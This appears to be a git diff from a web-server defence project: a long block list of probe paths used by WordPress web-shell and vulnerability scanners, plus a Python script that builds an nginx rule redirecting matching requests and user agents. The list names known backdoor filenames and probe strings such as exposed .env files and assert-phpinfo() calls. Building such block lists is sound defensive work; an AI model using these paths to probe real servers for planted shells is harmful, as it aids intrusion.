+/wp-admin/404.php +/wp-admin/about.php +/wp-admin/admin-ajax.php +/wp-admin/ajax-actions.php +/wp-admin/alfa.php +/wp-admin/autoload_classmap.php +/wp-admin/bala.php +/wp-admin/cloud.php +/wp-admin/css/ +/wp-admin/css/about.php +/wp-admin/css/admin.php +/wp-admin/css/colors/ +/wp-admin/css/colors/023wesd.php +/wp-admin/css/colors/blue/ +/wp-admin/css/colors/blue/CasperExV1.php +/wp-admin/css/colors/blue/atomlib.php +/wp-admin/css/colors/blue/blue.php +/wp-admin/css/colors/blue/cloud.php +/wp-admin/css/colors/blue/xmrlpc.php?p= +/wp-admin/css/colors/cloud.php +/wp-admin/css/colors/coffee/cloud.php +/wp-admin/css/colors/coffee/mari.php +/wp-admin/css/colors/coffee/marijuana.php +/wp-admin/css/colors/coffee/xmrlpc.php +/wp-admin/css/colors/coffee/xmrlpc.php?p= +/wp-admin/css/colors/ectoplasm/users.php +/wp-admin/css/colors/index.php +/wp-admin/css/colors/maro.php +/wp-admin/css/colors/xmrlpc.php?p= +/wp-admin/css/index.php +/wp-admin/css/index.php? +/wp-admin/css/license.php +/wp-admin/css/mari.php +/wp-admin/css/maro.php +/wp-admin/css/sx.php +/wp-admin/css/themes.php +/wp-admin/css/wp-login.php +/wp-admin/dropdown.php +/wp-admin/file.php +/wp-admin/images/023wesd.php +/wp-admin/images/about.php +/wp-admin/images/admin.php +/wp-admin/images/class.api.php +/wp-admin/images/cloud.php +/wp-admin/images/file.php +/wp-admin/images/iR7SzrsOUEP.php +/wp-admin/images/index.php +/wp-admin/images/install.php +/wp-admin/images/sx.php +/wp-admin/images/themes.php +/wp-admin/images/users.php +/wp-admin/images/wp-login.php +/wp-admin/images/xmrlpc.php?p= +/wp-admin/includes/about.php +/wp-admin/includes/class_api.php +/wp-admin/includes/cloud.php +/wp-admin/includes/iR7SzrsOUEP.php +/wp-admin/includes/index.php +/wp-admin/includes/mari.php +/wp-admin/includes/sx.php +/wp-admin/includes/themes.php +/wp-admin/includes/users.php +/wp-admin/includes/xmrlpc.php?p= +/wp-admin/index.php +/wp-admin/inputs.php +/wp-admin/install.php +/wp-admin/install.php?step=1&language=en_GB +/wp-admin/js/about.php +/wp-admin/js/about.php7 +/wp-admin/js/privacy-tools.min.php +/wp-admin/js/themes.php +/wp-admin/js/widgets/about.php7 +/wp-admin/js/widgets/class.api.php +/wp-admin/js/widgets/cloud.php +/wp-admin/js/widgets/cong.php +/wp-admin/js/widgets/iR7SzrsOUEP.php +/wp-admin/js/widgets/users.php +/wp-admin/js/widgets/xmrlpc.php?p= +/wp-admin/leaf.php +/wp-admin/leafmailer2.8.php +/wp-admin/maint/iR7SzrsOUEP.php +/wp-admin/maint/maint/ajax-actions.php +/wp-admin/maint/mari.php +/wp-admin/maint/moon.php +/wp-admin/maint/themes.php +/wp-admin/maint/users.php +/wp-admin/mari.php +/wp-admin/network/ +/wp-admin/network/about.php +/wp-admin/network/class_api.php +/wp-admin/network/cloud.php +/wp-admin/network/iR7SzrsOUEP.php +/wp-admin/network/index.php +/wp-admin/network/sx.php +/wp-admin/network/upfile.php +/wp-admin/network/xmrlpc.php?p= +/wp-admin/repeater.php +/wp-admin/setup-config.php +/wp-admin/setup-config.php?step=1 +/wp-admin/setup-config.php?step=1&language=en_GB +/wp-admin/shell20211028.php +/wp-admin/smaxx.php +/wp-admin/sx.php +/wp-admin/themes.php +/wp-admin/user/023wesd.php +/wp-admin/user/cloud.php +/wp-admin/user/iR7SzrsOUEP.php +/wp-admin/user/index.php +/wp-admin/user/sx.php +/wp-admin/user/themes.php +/wp-admin/user/users.php +/wp-admin/user/xmrlpc.php?p= +/wp-admin/users.php +/wp-admin/wp-login.php +/wp-admin/wp-signup.php +/wp-admin/wso112233.php +/wp-admin/xl2023.php +/wp-admin/xmrlpc.php?p= +/wp-apxupx.php?apx=upx +/wp-atom.php +/wp-blog-header.php +/wp-blog.php +/wp-commentin.php?pass=f0aab4595a024d626315fb786dce8282 +/wp-comments-post.php +/wp-configs.php +/wp-configs.php?p= +/wp-conflg.php +/wp-consar.php +/wp-content/ +/wp-content/023wesd.php +/wp-content/ALFA_DATA/alfacgiapi/ +/wp-content/BDKR28.php +/wp-content/about.php +/wp-content/alfa.php +/wp-content/auto_seo.php +/wp-content/autoload_classmap.php +/wp-content/backups-dup-lite/themes.php +/wp-content/bala.php +/wp-content/banners/about.php +/wp-content/blogs.dir/about.php +/wp-content/cache/themes.php +/wp-content/cloud.php +/wp-content/cong.php +/wp-content/dropdown.php +/wp-content/file.php +/wp-content/fonts/themes.php +/wp-content/gallery/about.php +/wp-content/index.php +/wp-content/index.php?x=ooo +/wp-content/inputs.php +/wp-content/install.php +/wp-content/languages/about.php +/wp-content/languages/themes/class_api.php +/wp-content/leafmailer2.8.php +/wp-content/mari.php +/wp-content/patior/ +/wp-content/plugins/ +/wp-content/plugins/Cache/Cache.php +/wp-content/plugins/Cache/dropdown.php +/wp-content/plugins/TOPXOH/wDR.php +/wp-content/plugins/WordPressCore/ +/wp-content/plugins/WordPressCore/blkfqnikz.php +/wp-content/plugins/WordPressCore/include.php +/wp-content/plugins/WordPressCore/smaxx.php +/wp-content/plugins/about.php +/wp-content/plugins/alfa-rex.php +/wp-content/plugins/anttt/simple.php +/wp-content/plugins/aryabot/mar.php +/wp-content/plugins/aryabot/mari.php +/wp-content/plugins/bala.php +/wp-content/plugins/core-plugin/include.php +/wp-content/plugins/core-plugin/smaxx.php +/wp-content/plugins/core/include.php +/wp-content/plugins/db-toolkit/dbtoolkit_import.php +/wp-content/plugins/dos2unix/dos2unix.php +/wp-content/plugins/download-plugin/wp-access.php +/wp-content/plugins/dropdown.php +/wp-content/plugins/elementor/sx.php +/wp-content/plugins/envato-market/inc/class-envato-market-api.php +/wp-content/plugins/essential-addons-for-elementor-lite/readme.txt +/wp-content/plugins/fix/sx.php +/wp-content/plugins/fix/up.php +/wp-content/plugins/google-seo-rank/module.php +/wp-content/plugins/hellopress/wp_filemanager.php +/wp-content/plugins/index.php +/wp-content/plugins/index.php?p= +/wp-content/plugins/inputs.php +/wp-content/plugins/install.php +/wp-content/plugins/ioptimization/IOptimize.php?rchk +/wp-content/plugins/linkpreview/db.php?u +/wp-content/plugins/owfsmac/mar.php +/wp-content/plugins/owfsmac/maro.php +/wp-content/plugins/press/wp-class.php +/wp-content/plugins/pwnd-1/pwnd.php +/wp-content/plugins/pwnd/pwnd.php +/wp-content/plugins/revslider/includes/external/page/index.php +/wp-content/plugins/seoo/wsoyanz.php +/wp-content/plugins/seoo/wsoyanz1.php +/wp-content/plugins/seoplugins/db.php?u +/wp-content/plugins/seoplugins/mar.php +/wp-content/plugins/shell20211028.php +/wp-content/plugins/simple-google-recaptcha/recaptcha.php +/wp-content/plugins/smaxx.php +/wp-content/plugins/upload/up.php +/wp-content/plugins/w0rdpr3ssnew/about.phpp +/wp-content/plugins/w0rdpr3ssnew/wp-login.php +/wp-content/plugins/wordpresss3cll/includes.php +/wp-content/plugins/wordpresss3cll/up.php +/wp-content/plugins/wordpresss3cll/wp-login.php +/wp-content/plugins/wp-apxupx.php?apx=upx +/wp-content/plugins/wp-automatic/css/wp-automatic.css +/wp-content/plugins/wp-catcher/index.php +/wp-content/plugins/wp-config-sample.php +/wp-content/plugins/wp-file-upload/ROOBOTS.php +/wp-content/plugins/wp-help/ +/wp-content/plugins/wp-theme-editor/include.php +/wp-content/plugins/wpyii2/wpyii2.php +/wp-content/plugins/wso112233.php +/wp-content/plugins/yyobang/mar.php +/wp-content/pm.php +/wp-content/product.php +/wp-content/radio.php +/wp-content/repeater.php +/wp-content/shell20211028.php +/wp-content/smaxx.php +/wp-content/style-css.php +/wp-content/sx.php +/wp-content/themes.php +/wp-content/themes/ +/wp-content/themes/404.php +/wp-content/themes/about.php +/wp-content/themes/admin.php +/wp-content/themes/astra/mar.php +/wp-content/themes/bala.php +/wp-content/themes/digital-download/new.php +/wp-content/themes/fiestaresidences/download.php +/wp-content/themes/finley/min.php +/wp-content/themes/index.php +/wp-content/themes/inputs.php +/wp-content/themes/konzept/includes/uploadify/upload.php +/wp-content/themes/mTheme-Unus/css/css.php +/wp-content/themes/mero-magazine/ws.php +/wp-content/themes/pridmag/db.php?u +/wp-content/themes/seotheme/db.php?u +/wp-content/themes/seotheme/mar.php +/wp-content/themes/shell20211028.php +/wp-content/themes/sketch/404.php +/wp-content/themes/tflow/up.php +/wp-content/themes/themes.php +/wp-content/themes/travel/issue.php +/wp-content/themes/travelscape/json.php +/wp-content/themes/twenty/twenty.php +/wp-content/themes/twentyfive/include.php +/wp-content/themes/twentyfive/smaxx.php +/wp-content/themes/wp-classic/inc/index.php +/wp-content/themes/wp-pridmag/up.php +/wp-content/themes/wso112233.php +/wp-content/updates.php +/wp-content/updraft/about.php +/wp-content/updraft/themes.php +/wp-content/upgrade-temp-backup/about.php +/wp-content/upgrade-temp-backup/themes.php +/wp-content/upgrade/ +/wp-content/upgrade/function.php +/wp-content/upgrade/iR7SzrsOUEP.php +/wp-content/upgrade/index.php +/wp-content/upgrade/sx.php +/wp-content/upgrade/themes.php +/wp-content/uploads/ +/wp-content/uploads/2023/ +/wp-content/uploads/bala.php +/wp-content/uploads/cache.php +/wp-content/uploads/cong.php +/wp-content/uploads/error_log.php +/wp-content/uploads/inputs.php +/wp-content/uploads/shell20211028.php +/wp-content/uploads/themes.php +/wp-content/uploads/up.php +/wp-content/uploads/wp-login.php.suspected +/wp-content/uploads/wpr-addons/forms/ +/wp-content/uploads/wpr-addons/forms/b1ack.php +/wp-content/uploads/wso112233.php +/wp-content/uploads/xl2023.php +/wp-content/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php +/wp-content/wp-apxupx.php?apx=upx +/wp-content/wp-cron.php?ac=3 +/wp-content/wso112233.php +/wp-content/xl2023.php +/wp-cron.php +/wp-head.php +/wp-header.php +/wp-hoard.php +/wp-include/alfa.php +/wp-include/auto_seo.php +/wp-include/inputs.php +/wp-include/xmrlpc.php7 +/wp-includes.bak/html-api/about.php +/wp-includes.bak/random_compat/themes.php +/wp-includes/ +/wp-includes/404.php +/wp-includes/ID3/ +/wp-includes/ID3/about.php +/wp-includes/ID3/sx.php +/wp-includes/ID3/themes.php +/wp-includes/ID3/wp-login.php +/wp-includes/IXR/about.php +/wp-includes/IXR/sx.php +/wp-includes/IXR/themes.php +/wp-includes/IXR/wp-login.php +/wp-includes/PHPMailer/themes.php +/wp-includes/Requests/Text/ +/wp-includes/Requests/Text/admin.php +/wp-includes/Requests/about.php +/wp-includes/Requests/atomlib.php +/wp-includes/Requests/dropdown.php +/wp-includes/Requests/themes.php +/wp-includes/SimplePie/ +/wp-includes/SimplePie/IRI-stream.php +/wp-includes/SimplePie/about.php +/wp-includes/SimplePie/file.php +/wp-includes/SimplePie/index.php +/wp-includes/SimplePie/plugins.php +/wp-includes/SimplePie/wp-login.php +/wp-includes/Text/about.php +/wp-includes/Text/themes.php +/wp-includes/about.php +/wp-includes/admin.php +/wp-includes/bak.php +/wp-includes/bala.php +/wp-includes/block-patterns/about.php +/wp-includes/block-supports/sx.php +/wp-includes/block-supports/themes.php +/wp-includes/blocks/about.php +/wp-includes/blocks/sx.php +/wp-includes/blocks/themes.php +/wp-includes/certificates/themes.php +/wp-includes/cloud.php +/wp-includes/css/buttons.css +/wp-includes/css/themes.php%20 +/wp-includes/customize/about.php +/wp-includes/dropdown.php +/wp-includes/fonts/wp-login.php +/wp-includes/function.php +/wp-includes/html-api/themes.php +/wp-includes/id3/license.txt/2019/wp-includes/wlwmanifest.xml +/wp-includes/id3/license.txt/2020/wp-includes/wlwmanifest.xml +/wp-includes/id3/license.txt/2021/wp-includes/wlwmanifest.xml +/wp-includes/id3/license.txt/blog/wp-includes/wlwmanifest.xml +/wp-includes/id3/license.txt/cms/wp-includes/wlwmanifest.xml +/wp-includes/id3/license.txt/feed/ +/wp-includes/id3/license.txt/shop/wp-includes/wlwmanifest.xml +/wp-includes/id3/license.txt/site/wp-includes/wlwmanifest.xml +/wp-includes/id3/license.txt/test/wp-includes/wlwmanifest.xml +/wp-includes/id3/license.txt/web/wp-includes/wlwmanifest.xml +/wp-includes/id3/license.txt/wordpress/wp-includes/wlwmanifest.xml +/wp-includes/id3/license.txt/wp/wp-includes/wlwmanifest.xml +/wp-includes/id3/license.txt/wp1/wp-includes/wlwmanifest.xml +/wp-includes/id3/license.txt/xmlrpc.php?rsd +/wp-includes/images/about.php +/wp-includes/images/css.php +/wp-includes/images/include.php +/wp-includes/images/smaxx.php +/wp-includes/images/smilies/about.php +/wp-includes/images/themes.php +/wp-includes/index.php +/wp-includes/inputs.php +/wp-includes/install.php +/wp-includes/js/500.php +/wp-includes/js/jcrop/sx.php +/wp-includes/js/jquery/jquery.js +/wp-includes/js/quicktags.js +/wp-includes/js/themes.php +/wp-includes/js/tinymce/plugins/compat3x/css/index.php +/wp-includes/js/tinymce/skins/lightgray/fonts/sx.php +/wp-includes/js/tinymce/skins/lightgray/img/index.php +/wp-includes/js/tinymce/skins/lightgray/img/index.php?p= +/wp-includes/js/tinymce/skins/wordpress/images/index.php +/wp-includes/makeasmtp.php +/wp-includes/mari.php +/wp-includes/pomo/about.php +/wp-includes/pomo/fgertreyersd.php.suspected +/wp-includes/pomo/themes.php +/wp-includes/pomo/wp-login.php +/wp-includes/random_compat/themes.php +/wp-includes/repeater.php +/wp-includes/rest-api/about.php +/wp-includes/rest-api/endpoints/html.php +/wp-includes/rest-api/fields/cache/ +/wp-includes/rest-api/sx.php +/wp-includes/rest-api/themes.php +/wp-includes/shell20211028.php +/wp-includes/sitemaps/themes.php +/wp-includes/smaxx.php +/wp-includes/sodium_compat/src/Core/Curve25519/Ge/network.php +/wp-includes/sodium_compat/src/Core/Curve25519/Ge/wp_blog.php +/wp-includes/sodium_compat/themes.php +/wp-includes/sts.php +/wp-includes/style-engine/about.php +/wp-includes/style-engine/themes.php +/wp-includes/sx.php +/wp-includes/system_log.php?p= +/wp-includes/theme-compat/themes.php +/wp-includes/theme-compat/wp-aespa.php +/wp-includes/themes.php +/wp-includes/widgets/about.php +/wp-includes/widgets/include.php +/wp-includes/widgets/themes.php +/wp-includes/wlwmanifest.xml +/wp-includes/wp-activate.php +/wp-includes/wp-class.php +/wp-includes/wp-cron.php?ac=3 +/wp-includes/wp-load.php +/wp-includes/wp-login.php +/wp-includes/wso112233.php +/wp-includes/xl2023.php +/wp-info.php +/wp-json +/wp-json/litespeed/v1/cdn_status +/wp-json/wp/v2/users +/wp-links-opml.php +/wp-load.php +/wp-login.php +/wp-logout.php +/wp-mail.php +/wp-manage0.php +/wp-manage1.php +/wp-managee1.php +/wp-p.php7 +/wp-plain.php +/wp-seo.php +/wp-signup.php +/wp-sigunq.php +/wp-themes.php7 +/wp-trackback.php +/wp.-.admin.php +/wp.php +/wp.php?p= +/wp/ +/wp/wp-admin/includes/class-wp-page-mvb2yr.php +/wp/wp-admin/setup-config.php?step=1 +/wp/wp-commentin.php?pass=f0aab4595a024d626315fb786dce8282 +/wp1010.php +/ws.php +/ws.php7 +/wsa.php +/wso-x569.php +/wso112233.php +/wsoyanz.php +/www/.env +/wzy.php?action=door123 +/x.php +/xl.php +/xl2023.php +/xleet-shell.php +/xleet.php +/xmlrpc.php +/xmrlpc.php +/xmrlpc.php7 +/xmrlpc.php?p= +/xt/smaxx.php +/xxl-job-admin/login +/xxl.php +/yanz.php +/ynz.PhP7 +/yybbs.cgi +/zb_system/image/common/user_1.png +/zb_users/avatar/0.png +/zhi/tongjis.php?assert-phpinfo() +/zhiz/tongjis.php?assert-phpinfo() +/zhizhu/tongjis.php?assert-phpinfo() +/zhu/tongjis.php?assert-phpinfo() +/zrqubdca.php?Fox=d3wL7 +/zz/tongjis.php?assert-phpinfo() +/zzhu/tongjis.php?assert-phpinfo() \ No newline at end of file diff --git a/generate_config.py b/generate_config.py new file mode 100755 index 0000000..7ed3d3e --- /dev/null +++ b/generate_config.py @@ -0,0 +1,57 @@ +blocked_agents_import = open("blocked-agents.txt", "r") +blocked_agents = blocked_agents_import.readlines() +blocked_agents_sep_d = "" + +for agent in blocked_agents: + if agent[-1] == "\n": + blocked_agents_sep_d += agent[:-1] + "|" + else: + blocked_agents_sep_d += agent + "|" +blocked_agents_sep_d = blocked_agents_sep_d[:-1] + + +blocked_paths_import = open("blocked-paths.txt", "r") +blocked_paths = blocked_paths_import.readlines() +blocked_paths_sep_d = "" + +for path in blocked_paths: + if path[-1] == "\n": + blocked_paths_sep_d += path[:-1] + "|" + else: + blocked_paths_sep_d += path + "|" +blocked_paths_sep_d = blocked_paths_sep_d[:-1] + + +allowed_agents_import = open("allowed-agents.txt", "r") +allowed_agents = allowed_agents_import.readlines() +allowed_agents_sep_d = "" + +for agent in allowed_agents: + if agent[-1] == "\n": + allowed_agents_sep_d += agent[:-1] + "|" + else: + allowed_agents_sep_d += agent + "|" +allowed_agents_sep_d = allowed_agents_sep_d[:-1] + +# sorry this will be very messy +final_config = f''' set $redir_to_gz 1; + if ($http_user_agent !~* ({blocked_agents_sep_d})) {{ + set $redir_to_gz 0; + }} + if ($http_user_agent ~* ({allowed_agents_sep_d})) {{ + set $redir_to_gz 0; + }} + if ($http_user_agent == "") {{ + set $redir_to_gz 1; + }} + + location ~ ^/({blocked_paths_sep_d})/ {{ + set $redir_to_gz 1; + }} + + if ($redir_to_gz) {{ + return 301 https://gz.notfire.cc; + }}''' + +output_config = open("output_config.txt", "w+") +output_config.write(final_config) \ No newline at end of file